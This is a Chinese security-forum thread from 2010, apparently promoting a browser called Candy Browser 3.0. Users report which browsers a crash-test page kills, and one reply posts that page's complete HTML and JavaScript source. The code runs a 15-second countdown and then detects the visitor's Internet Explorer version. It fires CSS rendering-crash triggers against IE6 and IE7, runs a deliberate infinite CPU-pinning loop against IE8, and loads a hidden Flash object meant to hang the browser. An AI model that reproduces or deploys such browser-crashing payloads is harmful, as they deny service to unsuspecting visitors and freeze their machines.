楼主: AIRSHAPE
收起左侧

[讨论] 15秒弄死80%以上浏览器

  [复制链接]
蓝色飞鱼
发表于 2010-7-18 18:14:20 | 显示全部楼层
糖果广告吧,op通过
chengshiniu
发表于 2010-7-25 21:00:45 | 显示全部楼层
360确实可以没问题  
jshbkf
发表于 2010-7-25 21:27:01 | 显示全部楼层
chromium挂了
llzy3575
发表于 2010-7-25 21:41:49 | 显示全部楼层
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh_cn" lang="zh_cn">
  3. <head>
  4. <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
  5. <title>糖果浏览器页面真死测试</title>

  6. </head>
  7. <body bgcolor="#ffffff" onload=timer()>


  8. <script language="javascript">AC_FL_RunContent = 0;</script>
  9. <script src="AC_RunActiveContent.js" language="javascript"></script>
  10. <script type="text/javascript">
  11.         function do_crash6(){//IE6崩溃
  12.                 var strBody = "";
  13.                 //对firefox不好用,对糖果可以,对IE8也不好用.
  14.                 //strBody += "<style>*{position:relative}</style><table><input></table>";
  15.                 strBody += "<style>*{position:relative}</style><table><input></table>";
  16.                 document.write(strBody);
  17.                 //do_crash1();//js递归调用,弹出内存溢出对话框
  18.         }
  19.         function do_crash7(){//IE7崩溃
  20.                 var strBody = "";
  21.                 strBody += "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" ";
  22.                 strBody += ""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">";
  23.                 strBody += "<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh_cn" lang="zh_cn">";
  24.                 strBody += "<head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" />";
  25.                 strBody += "</head><body>";
  26.                 strBody += "<style type="text/css">div{float:left;width:175px;}";
  27.                 strBody += "ul{overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}li{position:relative;}<\/style>";
  28.                 strBody += "<div><ul><li>崩溃崩溃崩溃崩溃崩溃crash ie7<\/li>";
  29.                 strBody += "<li>崩溃崩溃崩溃崩溃崩溃crash ie7<\/li><\/ul><\/div>";
  30.                 strBody += "</body></html>";
  31.                 document.write(strBody);
  32.         }
  33.         function do_crash3(){//IE8无反应
  34.                 var strBody = "";
  35.                 //for (var o in document.querySelectorAll('*'));//不好用
  36.                 strBody += "<script>for(x in document.write){document.write(x)\;}<\/script>";//不好用
  37.                 document.write(strBody);
  38.                 //do_crash1();//js递归调用,弹出内存溢出对话框
  39.         }
  40.         function IsIE8Browser(){//正确判断了IE8
  41.                 var rv = -1;
  42.                 var ua = navigator.userAgent;
  43.                 var re = new RegExp("Trident\/([0-9]{1,}[\.0-9]{0,})");
  44.                 if (re.exec(ua) != null){
  45.                         rv = parseFloat(RegExp.$1);
  46.                 }
  47.                 return (rv == 4);
  48.         }
  49.         var CUR_TIME = 0;
  50.     var END_TIME = 16;
  51.     var LEFT_TIME;
  52.     var ID;
  53.         var isMinIE4 = isMinIE5 = isMinIE5_5 = isMinIE6 = isMinIE7 = isMinIE8 = false;
  54.     function timer() {
  55.         ID = window.setTimeout("Ontimer()", 1000);
  56.         }
  57.         function Ontimer() {
  58.                 LEFT_TIME = END_TIME - CUR_TIME;
  59.                 if( LEFT_TIME <= 0  ){
  60.                         //do_crash3();
  61.                         //document.body.insertAdjacentHTML("BeforeEnd","<style>*{position:relative}</style><table><input></table>");
  62.                         //获是userAgent信息,里面表示浏览器的相关信息   
  63.                         //navigator.appVersion获得版本号的信息   
  64.                         var sUserAgent = navigator.userAgent;
  65.                         var isIE = sUserAgent.indexOf("compatible") > -1 && sUserAgent.indexOf("MSIE") > -1;
  66.                         if (isIE){
  67.                                 isMinIE8 = IsIE8Browser();//判断是否为IE8
  68.                                 var reIE = new RegExp("MSIE (\\d+\\.\\d+);");//用正则表示式去获得版本号
  69.                                 reIE.test(sUserAgent);
  70.                                 var fIEVersion = parseFloat(RegExp["$1"]);   
  71.                                                         
  72.                                 isMinIE4 = fIEVersion >= 4;      //true or false
  73.                                 isMinIE5 = fIEVersion >= 5;
  74.                                 isMinIE5_5 = fIEVersion >= 5.5;
  75.                                 isMinIE6 = fIEVersion >= 6.0;
  76.                                 isMinIE7 = fIEVersion >= 7.0;
  77.                         }
  78.                         if( isMinIE8 )
  79.                                 do_crash2();//死循环,无响应
  80.                         else if( isMinIE7 )
  81.                                 do_crash7();//IE7崩溃
  82.                         else
  83.                                 do_crash6();//IE6崩溃
  84.                                 
  85.                         if (AC_FL_RunContent == 0){
  86.                                 alert("This page requires AC_RunActiveContent.js.");
  87.                         }
  88.                         else{
  89.                                 AC_FL_RunContent(//让浏览器假死,因为firefox不采用IE内核
  90.                                         'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0',
  91.                                         'width', '0',
  92.                                         'height', '0',
  93.                                         'src', 'testdead',
  94.                                         'quality', 'high',
  95.                                         'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
  96.                                         'align', 'middle',
  97.                                         'play', 'true',
  98.                                         'loop', 'true',
  99.                                         'scale', 'showall',
  100.                                         'wmode', 'window',
  101.                                         'devicefont', 'false',
  102.                                         'id', 'testdead',
  103.                                         'bgcolor', '#ffffff',
  104.                                         'name', 'testdead',
  105.                                         'menu', 'true',
  106.                                         'allowFullScreen', 'false',
  107.                                         'allowScriptAccess','sameDomain',
  108.                                         'movie', 'testdead',
  109.                                         'salign', ''
  110.                                 ); //end AC code
  111.                         }
  112.                         //do_crash7();//IE7崩溃
  113.                         //do_crash2();//死循环,无响应
  114.                 window.clearTimeout(ID);
  115.                         return 0;
  116.         }
  117.         else{
  118.             CUR_TIME ++;
  119.         }
  120.                 ID = window.setTimeout("Ontimer()", 1000);//启动计时器
  121.         }
  122.         function do_crash2(){
  123.                 var i;
  124.                 for(i =0; i<10000; i){//死循环,让CPU使用率百分之百
  125.                         document.getElementById("countdown").value += (i + " - [url]http://www.mkyong.com[/url]\n");
  126.                         countdown.value = (i + " - [url]http://www.mkyong.com[/url]\n");
  127.                         //countdown.value = i;
  128.                 }
  129.         }
  130.         function test(){
  131.                 //alert("lgood");
  132.         }

  133. </script>


  134. <br><br><br>
  135. <table width=100% height=26 margin= 100>
  136.         <tr>
  137.             <td>
  138.           <p><font color='ff0000'> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;您的浏览器将在15秒钟后崩溃!请到任务管理器关闭你的浏览器(Firefox,Chrome不受影响)</font></p>
  139.       <p><font  color='ff0000'> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;用糖果浏览器3.0打开则可安然无恙。糖果浏览器3.0采用先进的多进程技术,可有效地防止网页真死(崩溃)。 </font> </p></td>
  140.   </tr>
  141. </table>
  142. <br><br><br><br><br><br><br><br>
  143. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  144. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
  145. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

  146. <script language="javascript">
  147.         if (AC_FL_RunContent == 0) {
  148.                 alert("此页需要 AC_RunActiveContent.js");
  149.         }
  150.         else{
  151.                 AC_FL_RunContent(
  152.                         'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0',
  153.                         'width', '550',
  154.                         'height', '200',
  155.                         'src', 'daojishi1',
  156.                         'quality', 'high',
  157.                         'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
  158.                         'align', 'middle',
  159.                         'play', 'true',
  160.                         'loop', 'true',
  161.                         'scale', 'showall',
  162.                         'wmode', 'window',
  163.                         'devicefont', 'false',
  164.                         'id', 'testdead',
  165.                         'bgcolor', '#ffffff',
  166.                         'name', 'daojishi1',
  167.                         'menu', 'true',
  168.                         'allowFullScreen', 'false',
  169.                         'allowScriptAccess','sameDomain',
  170.                         'movie', 'daojishi1',
  171.                         'salign', ''
  172.                 ); //end AC code
  173.         }
  174.         
  175. </script>
  176. <table align="center"><tr><td>
  177. <noscript>
  178.         <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="550" height="200" id="testdead" align="middle">
  179.         <param name="allowScriptAccess" value="sameDomain" />
  180.         <param name="allowFullScreen" value="false" />
  181.         <param name="movie" value="daojishi1.swf" />
  182.         <param name="quality" value="high" />
  183.         <param name="bgcolor" value="#ffffff" />
  184.         <embed src="daojishi1.swf" quality="high" bgcolor="#ffffff" width="550" height="200" name="testdead" align="middle" allowScriptAccess="sameDomain" allowFullScreen="false" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
  185.         </object>
  186. </noscript>
  187. </td></tr></table>
  188. <input id="countdown" type='hidden'>
  189. <!--<input id="countdown" type="text" width="100" height="200">-->
  190. <!--<textarea id="test" cols=80 rows=50></textarea>-->
  191. <br/>
  192. <!-- document.body.insertAdjacentHTML("BeforeEnd","<iframe src='http://text.sudawei123.com/text1.jsp' width=100 height=100></iframe>");-->
  193. <!--对firefox失效-->
  194. <!--<style>*{position:relative}</style><table><input></table>-->
  195. <div style="display:none;">
  196. <script type="text/javascript" src="http://js.tongji.linezing.com/1138598/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1138598/tongji.gif"/></a></noscript>
  197. </div>
  198. </body>
  199. </html>

复制代码
网页源代码
oneappleliu
发表于 2010-7-25 22:27:41 | 显示全部楼层
opera没问题
liu22566925
发表于 2010-8-2 15:37:41 | 显示全部楼层
搜狗没事,ie8只能关闭
errol0405
发表于 2010-8-2 15:52:19 | 显示全部楼层
世界之窗 无视之
Lance6716
发表于 2010-8-2 17:12:02 | 显示全部楼层
怎么我的Chrome挂了...
pc1012998097
发表于 2010-8-2 17:27:06 | 显示全部楼层
世界之窗,假死有点卡,真死打开了跟没打开那样快,哈哈~
rockdeng
头像被屏蔽
发表于 2010-8-2 17:50:49 | 显示全部楼层
坚决不试   傲游肯定崩溃假死
我还是别惹自己生气了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-16 04:48 , Processed in 0.129186 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表